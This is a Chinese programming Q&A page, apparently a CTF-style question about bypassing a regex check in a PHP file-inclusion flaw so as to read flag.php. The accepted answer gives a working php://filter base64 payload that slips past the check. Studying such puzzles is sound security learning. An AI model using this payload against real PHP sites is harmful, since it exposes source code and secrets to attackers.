iringzh 2022-09-29 09:29 采纳率: 100%
浏览 25
已结题

PHP中文件包含漏洞的利用

PHP中文件包含漏洞的利用
if(preg_match("/some/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Try again?";
    }

没有开allow_url_include,所以无法用data协议来解这个问题。因为需要参数file的值包含字符串some,目前不知道如何用php://filter来读文件,想请问有无好的Bypass的方法?

  • 写回答

2条回答 默认 最新

  • monmomono 2022-10-04 00:05
    关注

    php://filter/read=convert.base64-encode/some/resource=flag.php

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 10月15日
  • 已采纳回答 10月7日
  • 创建了问题 9月29日

悬赏问题

  • ¥15 ecplise在连接数据库时显示加载驱动成功但是数据库连接失败
  • ¥15 visionmaster启动失败,提示为“机器不满足授权而被禁用”
  • ¥50 用logisim设计16位单时钟周期cpu
  • ¥15 IDEA中圈复杂度如何具体设置
  • ¥50 labview采集不了数据
  • ¥15 Multisim红外倒车雷达仿真中距离问题
  • ¥15 请上面代码做什么处理或什么混淆
  • ¥15 英雄联盟自定义房间置顶
  • ¥15 W5500网线插上无反应
  • ¥15 如何用字典的Key,显示在WPF的xaml中